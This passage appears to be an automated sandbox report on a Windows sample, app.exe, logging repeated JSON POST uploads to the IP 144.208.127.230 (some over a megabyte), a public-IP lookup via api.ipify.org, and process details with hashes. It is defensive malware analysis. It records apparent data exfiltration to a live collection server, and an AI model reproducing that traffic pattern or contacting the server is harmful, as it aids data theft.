                                                                                                                                            May 5, 2024 00:24:55.102848053 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1001
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.245388985 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:55 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:55.247212887 CEST 244 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 996
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.399734974 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:55 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:55.401648045 CEST 244 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 998
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.542815924 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:55 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:55.544415951 CEST 244 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 185
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.685813904 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:55 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:55.687386036 CEST 244 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 993
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.816900015 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:55 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:55.818664074 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1001
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.953720093 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:55 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:55.957369089 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1000
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.088408947 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:56 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:56.090285063 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1000
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.228220940 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:56 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:56.229861975 CEST 244 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 995
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.372591019 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:56 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:56.374567032 CEST 244 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 997
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.522296906 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:56 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:56.524049044 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1003
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.664613008 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:56 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:56.666251898 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1013
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.794918060 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:56 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:56.797039986 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1014
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.939390898 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:56 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:56.941421032 CEST 244 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 998
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.083237886 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.085170031 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1010
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.226768017 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.228637934 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1009
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.362283945 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.364016056 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1012
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.493560076 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.495294094 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1006
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.628474951 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.630544901 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1006
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.769421101 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.771349907 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1005
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.903383017 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.904882908 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1001
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:58.043065071 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:58.044924021 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1002
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:58.174956083 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:58 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:00.379357100 CEST  247  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 100842
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:01.263315916 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:01 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:02.593252897 CEST  246  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 29428
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:02.843919992 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:02 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:05.109874010 CEST  246  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 57241
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:05.286645889 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:05 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:07.037405968 CEST  248  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1270200
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.768264055 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:09 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success


                                                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                            0  192.168.11.20  49788  172.67.74.152  443  7132  C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                            2024-05-04 22:24:48 UTC  188  OUT  GET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Host: api.ipify.org
                                                                                                                                            2024-05-04 22:24:48 UTC  211  IN  HTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 04 May 2024 22:24:48 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Content-Length: 12
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Origin
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 87ebe72dfc33395c-IAD
                                                                                                                                            2024-05-04 22:24:48 UTC12INData Raw: 31 35 34 2e 31 36 2e 34 39 2e 34 31
                                                                                                                                            Data Ascii: 154.16.49.41


                                                                                                                                            Target ID:0
                                                                                                                                            Start time:00:23:27
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Users\user\Desktop\app.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\app.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'290'240 bytes
                                                                                                                                            MD5 hash:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:00:23:27
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7cb400000
                                                                                                                                            File size:875'008 bytes
                                                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:00:24:07
                                                                                                                                            Start date:05/05/2024
